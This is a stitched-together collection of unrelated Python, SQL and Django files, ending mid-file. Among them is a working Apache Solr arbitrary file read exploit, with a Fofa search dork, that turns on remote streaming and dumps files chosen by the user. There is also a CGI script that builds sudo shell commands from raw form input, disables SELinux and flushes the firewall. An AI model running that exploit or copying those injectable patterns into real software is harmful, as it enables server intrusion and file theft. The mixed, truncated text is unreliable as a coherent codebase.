from django.contrib import admin
from django.urls import path, include
from home import views
urlpatterns = [
    path('', views.home, name='home'),
    path('contact', views.contact, name='contact'),
    path('aboutus', views.aboutus, name='aboutus'),
    path('serach', views.serach, name='serach'),
]
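# A minimal sketch (an assumption, not taken from the project) of the view functions that
# home/views.py would need to expose for the routes above to resolve; the template names
# are illustrative only.
from django.shortcuts import render

def home(request):
    return render(request, 'home.html')

def contact(request):
    return render(request, 'contact.html')

def aboutus(request):
    return render(request, 'aboutus.html')

def serach(request):
    return render(request, 'serach.html')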
|
# -*- coding: utf-8 -*-
import nltk
from nltk.tag import StanfordNERTagger
from nltk.tokenize import word_tokenize
from textblob import TextBlob
from itertools import groupby
from operator import itemgetter
from collections import Counter
st = StanfordNERTagger(
'./stanford-ner/classifiers/english.all.3class.distsim.crf.ser.gz',
'./stanford-ner/stanford-ner.jar',
encoding='utf-8')
Names = []
def ner_finder(text):
Blob = TextBlob(text)
for sentence in Blob.sentences:
counting = {}
tokenized_sent = word_tokenize(unicode(sentence))
classified = st.tag(tokenized_sent)
for idx, val in enumerate(classified):
if val[1] == 'PERSON':
counting[idx] = val
keys = sorted(counting.keys())
for k, g in groupby(enumerate(keys), lambda d: d[0] - d[1]):
ids = map(itemgetter(1), g) # [0, 1, 2], [14, 15], etc.
person = ' '.join(counting[i][0] for i in ids) # Donald John Trump, Barack Obama, etc
Names.append(person)
print Names
return Counter(Names)
# text = u'''Donald John Trump never asked Donald John Trump the chief executive of Apple for leadership advice and Barack Obama, Michelle Obama.
# Still, Tim Cook and Donald John Trump could certainly teach the Republican presidential nominee about the art of the apology, telling the Washington Post in an interview published over the weekend that it is important for a leader to admit mistakes and move on.'''
#
# print ner_finder(text)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 1 12:38:01 2019
@author: xabuka
"""
import loading
max_features = 10000
maxlen = 100
training_samples = 1000 # We will be training on 1000 samples
validation_samples = 2000 # We will be validating on 2000 samples
data_dir = '../data/SplitedPalSent'
x_train, y_train = loading.load_train(data_dir,maxlen,training_samples,
validation_samples,max_features, Validation= False )
x_test, y_test = loading.load_test(data_dir,maxlen,max_features)
print('input_train shape:', x_train.shape)
print('input_test shape:', x_test.shape)
from keras.models import Sequential
from keras import layers
from keras.optimizers import RMSprop
from keras.layers import Embedding, Conv1D,MaxPooling1D, Dense,Dropout,LSTM
# Embedding
embedding_size = 300
# Convolution
kernel_size = 5
filters = 64
pool_size = 4
# LSTM
lstm_output_size = 70
# Training
batch_size = 32
epochs = 10
model = Sequential()
model.add(Embedding(max_features, embedding_size, input_length=maxlen))
model.add(Dropout(0.25))
model.add(Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1))
model.add(MaxPooling1D(pool_size=pool_size))
model.add(LSTM(lstm_output_size))
model.add(Dense(3,activation='softmax'))
model.compile(loss = 'categorical_crossentropy', optimizer='adam',metrics = ['accuracy'])
print(model.summary())
from keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor='val_loss', patience=2)
print('Train...')
model.fit(x_train, y_train, batch_size=batch_size,
          epochs=epochs, shuffle=True,
          validation_split=0.2,
          callbacks=[early_stopping])
# testing part, using the class probability matrices.
from sklearn import metrics
import numpy as np
#print(y_val[:,:])
x_test, y_test = loading.load_test(data_dir,maxlen,max_features)
yhat = model.predict(x_test, verbose = 2, batch_size = batch_size)
print(metrics.classification_report(y_test[:,:], np.round(yhat[:,:]),target_names = ["negative", "positive","no"]))
import matplotlib.pyplot as plt
import numpy as np
score = ['negative', 'positive']
def plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Greys):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(set(score)))
plt.xticks(tick_marks, score, rotation=45)
plt.yticks(tick_marks, score)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
# Compute confusion matrix
cm = metrics.confusion_matrix(y_test[:,1], np.round(yhat[:,1]))
np.set_printoptions(precision=2)
plt.figure()
plot_confusion_matrix(cm)
cm_normalized = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
plt.figure()
plot_confusion_matrix(cm_normalized, title='Normalized confusion matrix')
plt.show()
scores= model.evaluate(x_test, y_test,verbose=0)
print("Accuracy: %.2f%%" % (scores[1]*100))
|
from .tasks import Task
from .tasks import serialize_task, deserialize_task, serialize_tasks, deserialize_tasks
from .repository import Repository
|
from model.test import test
from controller.webServices import webServices
class testController():
    def createTest(self, hill, city):
        # keep a reference to the created test
        self.vytvorenyTest = test(1, hill, city)
    def addQuestion(self, pointA, pointB):
        webServices.findDistance(pointA, pointB)
        print("Question len: " + str(len(test.questions)))
|
CREATE TABLE `start` (
`id` int(11) NOT NULL,
`начало` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `start` (`id`, `начало`) VALUES
(1, 'герои '),
(2, 'предметы'),
(3, 'справочник'),
(4, 'пикер');
CREATE TABLE `simple items` (
`id` int(11) NOT NULL,
`простые предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `simple items` (`id`, `простые предметы`) VALUES
(1, 'Town Portal Scroll'),
(2, 'Ironwood Branch'),
(3, 'Quelling Blade'),
(4, 'Ring of Regen'),
(5, 'Ring of Health'),
(6, 'Aegis of the Immortal'),
(7, 'Potion'),
(8, 'Gautlets of Strenght'),
(9, 'Ring of protection'),
(10, 'Sages Mask');
CREATE TABLE `neutral items` (
`id` int(11) NOT NULL,
`нейтральные предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `neutral items` (`id`, `нейтральные предметы`) VALUES
(1, 'Разряд 1'),
(2, 'Разряд 2'),
(3, 'Разряд 3'),
(4, 'Разряд 4'),
(5, 'Разряд 5');
CREATE TABLE `items` (
`id` int(11) NOT NULL,
`предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `items` (`id`, `предметы`) VALUES
(1, 'простые'),
(2, 'сборные'),
(3, 'нейтральные');
CREATE TABLE `heroes` (
`id` int(11) NOT NULL,
`герои` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `heroes` (`id`, `герои`) VALUES
(1, 'сила'),
(2, 'ловкость'),
(3, 'интелект');
CREATE TABLE `discharge5` (
`id` int(11) NOT NULL,
`разряд5` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge5` (`id`, `разряд5`) VALUES
(1, 'Force Boots'),
(2, 'Stygian Desolator'),
(3, 'Seer Stone'),
(4, 'Mirror Shield'),
(5, 'Apex'),
(6, 'Ballista'),
(7, 'Book of the dead'),
(8, 'Fallen Sky'),
(9, 'Pirat Hat'),
(10, 'Ex Machina'),
(11, 'Giants Ring'),
(12, 'Book of Shadows');
CREATE TABLE `discharge4` (
`id` int(11) NOT NULL,
`разряд4` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge4` (`id`, `разряд4`) VALUES
(1, 'Timeless Relic'),
(2, 'Spell Prism'),
(3, 'Flicker'),
(4, 'Ninja Gear'),
(5, 'Illusion Cape'),
(6, 'The Leveller'),
(7, 'Minotaur Horn'),
(8, 'Telescope'),
(9, 'Trickster Cloak'),
(10, 'Stormcrafter'),
(11, 'Penta Edged Sword');
CREATE TABLE `discharge3` (
`id` int(11) NOT NULL,
`разряд3` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge3` (`id`, `разряд3`) VALUES
(1, 'Quickening Charm'),
(2, 'Spider Legs'),
(3, 'Paladin Sword'),
(4, 'Orb of Destruction'),
(5, 'Titan Sliver'),
(6, 'Mind Breaker'),
(7, 'Enchanted Quiver'),
(8, 'Elven Tunic'),
(9, 'Cloak of Flames'),
(10, ''),
(11, 'Psychic Headband');
CREATE TABLE `discharge2` (
`id` int(11) NOT NULL,
`разряд2` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge2` (`id`, `разряд2`) VALUES
(1, 'Ring of Aquila'),
(2, 'Imp Claw'),
(3, 'Nether Shawl'),
(4, 'Dragon Scale'),
(5, 'Pupls Gift'),
(6, 'Vambrace'),
(7, 'Grove Bow'),
(8, 'Philosopher stone'),
(9, 'Essence Ring'),
(10, 'Bullwhip'),
(11, 'Quicksilver Amulet');
CREATE TABLE `discharge1` (
`id` int(11) NOT NULL,
`разряд1` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `discharge1` (`id`, `разряд1`) VALUES
(1, 'Keen Optic'),
(2, 'Ironwood Tree'),
(3, 'Ocean Hert'),
(4, 'Broom Handle'),
(5, 'Trusty Shovel'),
(6, 'Faded Broach'),
(7, 'Arcan Ring'),
(8, 'Royal Jelly'),
(9, 'Chipped Vest'),
(10, 'Possessed Mask'),
(11, 'Fairys Trinket');
CREATE TABLE `directory` (
`id` int(11) NOT NULL,
`справочник` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `directory` (`id`, `справочник`) VALUES
(1, 'мета'),
(2, 'роли героев '),
(3, 'словарь '),
(4, 'советы'),
(5, 'моды и команды'),
(6, 'нейтральные крипы'),
(7, 'руны '),
(8, 'вардинг'),
(9, 'фарм');
CREATE TABLE `collect items` (
`id` int(11) NOT NULL,
`сборные предметы` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `collect items` (`id`, `сборные предметы`) VALUES
(1, 'Magic Wand'),
(2, 'Buckler'),
(3, 'Veil of Discord'),
(4, 'Hood of Defiance'),
(5, 'Crystalys'),
(6, 'Dragon Lance'),
(7, 'Null Talisman'),
(8, 'Ring of Basilius'),
(9, 'Glimmer Cape'),
(10, 'Vanguard');
CREATE TABLE `agility heroes` (
`id` int(11) NOT NULL,
`ловкость герои` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `agility heroes` (`id`, `ловкость герои`) VALUES
(1, 'Anti-mage'),
(2, 'Drow Ranger'),
(3, 'Juggernaut'),
(4, 'Mirana'),
(5, 'Morphling'),
(6, 'Phantom Lancer'),
(7, 'Vengeful Spirit'),
(8, 'Riki'),
(9, 'Sniper'),
(10, 'Templar Assassin'),
(11, 'Luna'),
(12, 'Bouty Hunter'),
(13, 'Ursa'),
(14, 'Gyrocopter'),
(15, 'Lone Druid'),
(16, 'Naga Siren'),
(17, 'Troll Warlord'),
(18, 'Ember Spirit'),
(19, 'Monkey King'),
(20, 'Pangolier'),
(21, 'Hoodwink'),
(22, 'Bloodseeker'),
(23, 'Shadow Fiend'),
(24, 'Razor'),
(25, 'Venomancer'),
(26, 'Faceless Void'),
(27, 'Phantom Assassin'),
(28, 'Viper'),
(29, 'Clinkz'),
(30, 'Broodmother'),
(31, 'Weaver'),
(32, 'Spetre'),
(33, 'Meepo'),
(34, 'Nyx Assassin'),
(35, 'Slark'),
(36, 'Medusa'),
(37, 'Terrorblade'),
(38, 'Arc Warden');
CREATE TABLE `intelligence heroes` (
`id` int(11) NOT NULL,
`интеллект герои` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `intelligence heroes` (`id`, `интеллект герои`) VALUES
(1, 'Cristal Maiden'),
(2, 'Puck'),
(3, 'Storm Spirit'),
(4, 'Windranger'),
(5, 'Zeus'),
(6, 'Lina'),
(7, 'Shadow Shaman'),
(8, 'Tinker'),
(9, 'Natures Prophet'),
(10, 'Enchantress'),
(11, 'Jakiro'),
(12, 'Chen'),
(13, 'Silencer'),
(14, 'Ogre Magi'),
(15, 'Rubick'),
(16, 'Disruptor'),
(17, 'Keeper of the light'),
(18, 'Skywrath Mage'),
(19, 'Oracle'),
(20, 'Techies'),
(21, 'Dark Willow'),
(22, 'Void Spirit'),
(23, 'Bane'),
(24, 'Lich'),
(25, 'Lion'),
(26, 'Witch Doctor'),
(27, 'Enigma'),
(28, 'Necrophos'),
(29, 'Warlock'),
(30, 'Queen of Pain'),
(31, 'Death Prophet'),
(32, 'Pugna'),
(33, 'Dazzle'),
(34, 'Leshrac'),
(35, 'Dark Seer'),
(36, 'Batrider'),
(37, 'Ancien Apparition'),
(38, 'Invoker'),
(39, 'Outworld Destroyer'),
(40, 'Shadow Demon'),
(41, 'Visage'),
(42, 'Winter Wyvern'),
(43, 'Grimstroke');
CREATE TABLE `power heroes` (
`id` int(11) NOT NULL,
`герои сила` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `power heroes` (`id`, `герои сила`) VALUES
(1, 'Earthshaker'),
(2, 'Sven'),
(3, 'Tiny'),
(4, 'Kunkka'),
(5, 'Beastmaster'),
(6, 'Dragon Knight'),
(7, 'Clockwerk'),
(8, 'Omniknight'),
(9, 'Huskar'),
(10, 'Alchemist'),
(11, 'Brewmaster'),
(12, 'Trent Protector'),
(13, 'Io'),
(14, 'Centaur Warrunner'),
(15, 'Timbersaw'),
(16, 'Bristleback'),
(17, 'Tusk'),
(18, 'Elder Titan'),
(19, 'Legion Commander'),
(20, 'Earth Spirit'),
(21, 'Phoenix'),
(22, 'Mars'),
(23, 'Snapfire'),
(24, 'Axe'),
(25, 'Pudge'),
(26, 'Sand King'),
(27, 'Slardar'),
(28, 'Tidehunter'),
(29, 'Wraith King'),
(30, 'Lifestealer'),
(31, 'Night Stalker'),
(32, 'Doom'),
(33, 'Spirit Breaker'),
(34, 'Lycan'),
(35, 'Chaos Knight'),
(36, 'Undying'),
(37, 'Magnus'),
(38, 'Abaddon'),
(39, 'Underlord');
|
# Generated by Django 2.2.7 on 2019-11-09 10:09
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Sneakers',
fields=[
('id_sneaker', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('brand', models.CharField(max_length=45)),
('material', models.CharField(max_length=45)),
('price', models.IntegerField()),
],
),
]
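# A sketch (assumed, not part of the migration file itself) of the models.py definition
# that this initial migration corresponds to:
from django.db import models

class Sneakers(models.Model):
    id_sneaker = models.AutoField(primary_key=True)
    name = models.CharField(max_length=100)
    brand = models.CharField(max_length=45)
    material = models.CharField(max_length=45)
    price = models.IntegerField()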
|
# coding=utf-8
# Apache Solr arbitrary file read (all versions)
# Fofa: app="Apache-Solr" || app="Solr"
import requests
import json
import sys
import time
def title():
    print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+")
    print("+~~~~~~ Apache Solr arbitrary file read ~~~~~~+")
    print("+~~~~~~ Use: python3 solr.py ~~~~~~+")
    print("+~~~~~~ url: http://x.x.x.x:port ~~~~~~+")
    print("+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+")
time.sleep(2)
def get_name(url):
    url_1 = url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        res = requests.get(url=url_1)
        # parse the JSON response into a Python dict and take the first core name
        name = str(list(json.loads(res.text)["status"])[0])
        print("[!] Got target core name: \033[31m%s\033[0m"%name+" [0]"+"URL:"+url+"/solr/"+name+"/config")
        return name
    except Exception as e:
        print("[!] The target URL cannot be exploited.",e)
        sys.exit(0)
def check_vul(url,name):
    url_2 = url +"/solr/" + name + "/config"
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
    try:
        res = requests.post(url=url_2,data=data)
        if "This response format" in res.text and res.status_code == 200:
            print("[!] \033[31mThe target is vulnerable\033[0m")
        else:
            print("[!] The target is not vulnerable")
            sys.exit(0)
    except Exception as e:
        print("[!] Request to the target failed.")
        sys.exit(0)
def read_files(url,name,file_name):
    url = url + "/solr/" + name + "/debug/dump?param=ContentStreams"
    # The Content-Type header is required here, otherwise the file cannot be read
    headers = {
        "Content-Type" : "application/x-www-form-urlencoded"
    }
    data = "stream.url=file://{}".format(file_name)
    try:
        res = requests.post(url=url,headers=headers,data=data)
        if "No such file or directory" in res.text:
            print("[!] Failed to read the file from the target!")
            sys.exit(0)
        else:
            print("Reading file..........")
            content = (json.loads(res.text)["streams"][0]["stream"])
            print("[o] File content:\n\033[34m{}\033[0m".format(content))
    except Exception as e:
        print("[!] The target seems to have aborted unexpectedly",e)
        sys.exit(0)
if __name__ == "__main__":
title()
url = str(input("\n[!] 请输入目标系统URL: "))
name = get_name(url)
check_vul(url,name)
file_name = str(input("[!] 请输入要读取的文件:"))
read_files(url,name,file_name)
|
from be.model import store
import sqlite3 as sqlite
import logging
# Check whether the goods still have enough stock
def check_num(goodsId, goodsNum):
    try:
        conn = store.get_db_conn()
        cursor = conn.execute(
            "SELECT goodsNum from goods where goodsId=?",
            (goodsId,),
        )
        row = cursor.fetchone()
        if row is None or row[0]-goodsNum < 0:
            return False
    except sqlite.Error as e:
        logging.error(str(e))
        return False
    return True
class Cart:
username: str
goodsId: str
goodsName: str
goodsPrice: str
goodsNum: str
totalValue: str
def __init__(self, username, goodsId, goodsName, goodsPrice, goodsNum, totalValue):
self.username = username
self.goodsId = goodsId
self.goodsName = goodsName
self.goodsPrice = goodsPrice
self.goodsNum = goodsNum
self.totalValue = totalValue
def addCart(username, goodsId, goodsName, goodsPrice, goodsNum, totalValue) -> bool:
conn = store.get_db_conn()
try:
        # Also check that the goods are still in stock
if not check_num(goodsId, goodsNum):
return False
conn.execute(
"INSERT into cart(username, goodsId, goodsName, goodsPrice, goodsNum, totalValue) VALUES (?, ?, ?, ?, ?, ?);",
(username, goodsId, goodsName, goodsPrice, goodsNum, totalValue),
)
conn.commit()
except BaseException as e:
print(e)
conn.rollback()
return False
return True
def delCart(username, goodsId, goodsNum) -> bool:
conn = store.get_db_conn()
try:
cursor = conn.execute(
"SELECT goodsNum, goodsPrice from cart where username=? and goodsId=?",
(username, goodsId),
)
row = cursor.fetchone()
if row is None:
return False
newgoodsNum = row[0] - goodsNum
newtotalValue = row[1]*newgoodsNum
if newgoodsNum == 0:
cursor = conn.execute("DELETE from cart where username=? and goodsId=?", (username, goodsId))
else:
conn.execute(
"UPDATE cart set goodsNum = ? where username=? and goodsId=?",
(newgoodsNum, username, goodsId),
)
conn.execute(
"UPDATE cart set totalValue = ? where username=? and goodsId=?",
(newtotalValue, username, goodsId),
)
conn.commit()
except BaseException as e:
print(e)
conn.rollback()
return False
return True
def getCart(username) -> (bool, list, float):
conn = store.get_db_conn()
try:
cursor = conn.execute(
"SELECT goodsName, goodsPrice, goodsNum, totalValue from cart where username=?",
            (username,),
)
contents = cursor.fetchall()
if contents is None:
            return False, [], 0
cartlist = []
sum = 0
for row in contents:
a = [row[0], row[1], row[2]]
sum += row[3]
cartlist.append(a)
except sqlite.Error as e:
logging.error(str(e))
        return False, [], 0
return True, cartlist, sum
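# Illustrative usage only (assumes the store module is configured and the goods/cart
# tables already exist; the literal values below are made up):
if __name__ == '__main__':
    if addCart('alice', 'g001', 'Notebook', 25, 2, 50):
        ok, items, total = getCart('alice')
        print(ok, items, total)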
|
import unittest
import numpy
import six
from six.moves import cPickle as pickle
from smqtk.representation.data_element.memory_element import DataMemoryElement
from smqtk.representation.descriptor_element.local_elements import \
DescriptorMemoryElement
from smqtk.representation.descriptor_index.memory import MemoryDescriptorIndex
from smqtk.utils import merge_dict
RAND_UUID = 0
def random_descriptor():
global RAND_UUID
d = DescriptorMemoryElement('random', RAND_UUID)
d.set_vector(numpy.random.rand(64))
RAND_UUID += 1
return d
class TestMemoryDescriptorIndex (unittest.TestCase):
def test_is_usable(self):
# Always usable because no dependencies.
self.assertEqual(MemoryDescriptorIndex.is_usable(), True)
def test_default_config(self):
# Default should be valid for constructing a new instance.
c = MemoryDescriptorIndex.get_default_config()
self.assertEqual(MemoryDescriptorIndex.from_config(c).get_config(), c)
def test_from_config_null_cache_elem(self):
inst = MemoryDescriptorIndex.from_config({'cache_element': None})
self.assertIsNone(inst.cache_element)
self.assertEqual(inst._table, {})
inst = MemoryDescriptorIndex.from_config({
'cache_element': {
'type': None
}
})
self.assertIsNone(inst.cache_element)
self.assertEqual(inst._table, {})
def test_from_config_null_cache_elem_type(self):
# An empty cache should not trigger loading on construction.
expected_empty_cache = DataMemoryElement()
inst = MemoryDescriptorIndex.from_config({
'cache_element': {
'type': 'DataMemoryElement',
'DataMemoryElement': {'bytes': ''}
}
})
self.assertEqual(inst.cache_element, expected_empty_cache)
self.assertEqual(inst._table, {})
def test_from_config(self):
        # Configured cache with some pickled bytes
expected_table = dict(a=1, b=2, c=3)
expected_cache = DataMemoryElement(bytes=pickle.dumps(expected_table))
inst = MemoryDescriptorIndex.from_config({
'cache_element': {
'type': 'DataMemoryElement',
'DataMemoryElement': {'bytes': expected_cache.get_bytes()}
}
})
self.assertEqual(inst.cache_element, expected_cache)
self.assertEqual(inst._table, expected_table)
def test_init_no_cache(self):
inst = MemoryDescriptorIndex()
self.assertIsNone(inst.cache_element, None)
self.assertEqual(inst._table, {})
def test_init_empty_cache(self):
cache_elem = DataMemoryElement()
inst = MemoryDescriptorIndex(cache_element=cache_elem)
self.assertEqual(inst.cache_element, cache_elem)
self.assertEqual(inst._table, {})
def test_init_with_cache(self):
d_list = (random_descriptor(), random_descriptor(),
random_descriptor(), random_descriptor())
expected_table = dict((r.uuid(), r) for r in d_list)
expected_cache = DataMemoryElement(bytes=pickle.dumps(expected_table))
inst = MemoryDescriptorIndex(expected_cache)
self.assertEqual(len(inst._table), 4)
self.assertEqual(inst.cache_element, expected_cache)
self.assertEqual(inst._table, expected_table)
self.assertEqual(set(inst._table.values()), set(d_list))
def test_get_config(self):
self.assertEqual(
MemoryDescriptorIndex().get_config(),
MemoryDescriptorIndex.get_default_config()
)
self.assertEqual(
MemoryDescriptorIndex(None).get_config(),
MemoryDescriptorIndex.get_default_config()
)
empty_elem = DataMemoryElement()
self.assertEqual(
MemoryDescriptorIndex(empty_elem).get_config(),
merge_dict(MemoryDescriptorIndex.get_default_config(), {
'cache_element': {'type': 'DataMemoryElement'}
})
)
dict_pickle_bytes = pickle.dumps({1: 1, 2: 2, 3: 3}, -1)
cache_elem = DataMemoryElement(bytes=dict_pickle_bytes)
self.assertEqual(
MemoryDescriptorIndex(cache_elem).get_config(),
merge_dict(MemoryDescriptorIndex.get_default_config(), {
'cache_element': {
'DataMemoryElement': {
'bytes': dict_pickle_bytes
},
'type': 'DataMemoryElement'
}
})
)
def test_cache_table_no_cache(self):
inst = MemoryDescriptorIndex()
inst._table = {}
inst.cache_table() # should basically do nothing
self.assertIsNone(inst.cache_element)
def test_cache_table_empty_table(self):
inst = MemoryDescriptorIndex(DataMemoryElement(), -1)
inst._table = {}
expected_table_pickle_bytes = pickle.dumps(inst._table, -1)
inst.cache_table()
self.assertIsNotNone(inst.cache_element)
self.assertEqual(inst.cache_element.get_bytes(),
expected_table_pickle_bytes)
def test_add_descriptor(self):
index = MemoryDescriptorIndex()
d1 = random_descriptor()
index.add_descriptor(d1)
self.assertEqual(index._table[d1.uuid()], d1)
d2 = random_descriptor()
index.add_descriptor(d2)
self.assertEqual(index._table[d2.uuid()], d2)
def test_add_many(self):
descrs = [
random_descriptor(),
random_descriptor(),
random_descriptor(),
random_descriptor(),
random_descriptor(),
]
index = MemoryDescriptorIndex()
index.add_many_descriptors(descrs)
# Compare code keys of input to code keys in internal table
self.assertEqual(set(index._table.keys()),
set([e.uuid() for e in descrs]))
# Get the set of descriptors in the internal table and compare it with
# the set of generated random descriptors.
r_set = set()
[r_set.add(d) for d in index._table.values()]
self.assertEqual(
set([e for e in descrs]),
r_set
)
def test_count(self):
index = MemoryDescriptorIndex()
self.assertEqual(index.count(), 0)
d1 = random_descriptor()
index.add_descriptor(d1)
self.assertEqual(index.count(), 1)
d2, d3, d4 = (random_descriptor(),
random_descriptor(),
random_descriptor())
index.add_many_descriptors([d2, d3, d4])
self.assertEqual(index.count(), 4)
d5 = random_descriptor()
index.add_descriptor(d5)
self.assertEqual(index.count(), 5)
def test_get_descriptors(self):
descrs = [
random_descriptor(), # [0]
random_descriptor(), # [1]
random_descriptor(), # [2]
random_descriptor(), # [3]
random_descriptor(), # [4]
]
index = MemoryDescriptorIndex()
index.add_many_descriptors(descrs)
# single descriptor reference
r = index.get_descriptor(descrs[1].uuid())
self.assertEqual(r, descrs[1])
# multiple descriptor reference
r = list(index.get_many_descriptors([descrs[0].uuid(),
descrs[3].uuid()]))
self.assertEqual(len(r), 2)
self.assertEqual(set(r),
{descrs[0], descrs[3]})
def test_clear(self):
i = MemoryDescriptorIndex()
n = 10
descrs = [random_descriptor() for _ in range(n)]
i.add_many_descriptors(descrs)
self.assertEqual(len(i), n)
i.clear()
self.assertEqual(len(i), 0)
self.assertEqual(i._table, {})
def test_has(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(10)]
i.add_many_descriptors(descrs)
self.assertTrue(i.has_descriptor(descrs[4].uuid()))
self.assertFalse(i.has_descriptor('not_an_int'))
def test_added_descriptor_table_caching(self):
cache_elem = DataMemoryElement(readonly=False)
descrs = [random_descriptor() for _ in range(3)]
expected_table = dict((r.uuid(), r) for r in descrs)
i = MemoryDescriptorIndex(cache_elem)
self.assertTrue(cache_elem.is_empty())
# Should add descriptors to table, caching to writable element.
i.add_many_descriptors(descrs)
self.assertFalse(cache_elem.is_empty())
self.assertEqual(pickle.loads(i.cache_element.get_bytes()),
expected_table)
# Changing the internal table (remove, add) it should reflect in
# cache
new_d = random_descriptor()
expected_table[new_d.uuid()] = new_d
i.add_descriptor(new_d)
self.assertEqual(pickle.loads(i.cache_element.get_bytes()),
expected_table)
rm_d = list(expected_table.values())[0]
del expected_table[rm_d.uuid()]
i.remove_descriptor(rm_d.uuid())
self.assertEqual(pickle.loads(i.cache_element.get_bytes()),
expected_table)
def test_remove(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(len(i), 100)
self.assertEqual(list(i.iterdescriptors()), descrs)
# remove singles
i.remove_descriptor(descrs[0].uuid())
self.assertEqual(len(i), 99)
self.assertEqual(set(i.iterdescriptors()),
set(descrs[1:]))
# remove many
rm_d = descrs[slice(45, 80, 3)]
i.remove_many_descriptors((d.uuid() for d in rm_d))
self.assertEqual(len(i), 99 - len(rm_d))
self.assertEqual(set(i.iterdescriptors()),
set(descrs[1:]).difference(rm_d))
def test_iterdescrs(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(set(i.iterdescriptors()),
set(descrs))
def test_iterkeys(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(set(i.iterkeys()),
set(d.uuid() for d in descrs))
def test_iteritems(self):
i = MemoryDescriptorIndex()
descrs = [random_descriptor() for _ in range(100)]
i.add_many_descriptors(descrs)
self.assertEqual(set(six.iteritems(i)),
set((d.uuid(), d) for d in descrs))
|
#!/usr/bin/python2
import commands
import cgi,cgitb
print "Content-type : text/html"
print ""
cgitb.enable()
x=cgi.FieldStorage()
user=x.getvalue('usr')
password=x.getvalue('passwd')
hd=x.getvalue('hd')
#for radio button
n=x.getvalue('x')
commands.getoutput("systemctl restart httpd")
commands.getoutput("setenforce 0")
commands.getoutput("iptables -F")
a=commands.getoutput("cat /var/www/html/users.txt | grep "+user+ " | awk '{print$1}'")
b=commands.getoutput("cat /var/www/html/users.txt | grep "+password+ " | awk '{print$7}'")
#NFS--------------------------------------------------------------------
#if (n=="1") and (a !="") and (b !="") :
if (n=="1") :
#1st need to create volume group(vg1)
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
commands.getoutput("sudo mkfs.ext4 /dev/vg1/"+user+" ")
commands.getoutput("sudo mkdir /media/"+user )
commands.getoutput("sudo mount /dev/vg1/"+user+" /media/"+user+"")
commands.getoutput("sudo echo '\n /media/"+user+" *(rw,no_root_squash) \n' >>/etc/exports")
commands.getoutput("sudo exportfs -r")
commands.getoutput("setenforce 0")
f1=open('/var/www/html/clienttar/staasclient.py','w+')
f1.write("#!/usr/bin/python2 \nimport os \nos.system('yum install nfs-utils -y') \nos.system('systemctl restart nfs')\nos.system('setenforce 0')\nos.system('iptables -F')\nos.system('mkdir /media/mystorage')\nos.system('mount 192.168.43.103:/media/"+user+" /media/mystorage')")
f1.close()
    commands.getoutput('sudo chmod 777 /var/www/html/clienttar/staasclient.py')
commands.getoutput("sudo tar -cvf /var/www/html/clienttar/"+user+"_staas.tar /var/www/html/clienttar/staasclient.py")
print "<html>"
print "<p><a href='http://192.168.43.103/clienttar/"+user+"_staas.tar' download>Downlode</a>tar file and run it</p>"
print "</html>"
#SSHFS--------------------------------------------------------------------
elif (n=="2") and (a !="") and (b !=""):
#commands.getoutput("sudo useradd "+user+"")
#commands.getoutput("sudo echo "+passwd+"| sudo passwd "+user+" --stdin")
commands.getoutput("sudo lvcreate --name "+user+" --size "+hd+"G vg1")
commands.getoutput("sudo mkfs.ext4 /dev/vg1/"+user+"")
commands.getoutput("sudo mkdir /media/"+user+"")
commands.getoutput("sudo mount /dev/vg1/"+user+" /media/"+user+"")
commands.getoutput("sudo chown "+user+" /media/"+user+"")
commands.getoutput("sudo chmod 777 /cloud/"+user+" ")
f1=open('/var/www/html/clienttar/staasclient.py','w+')
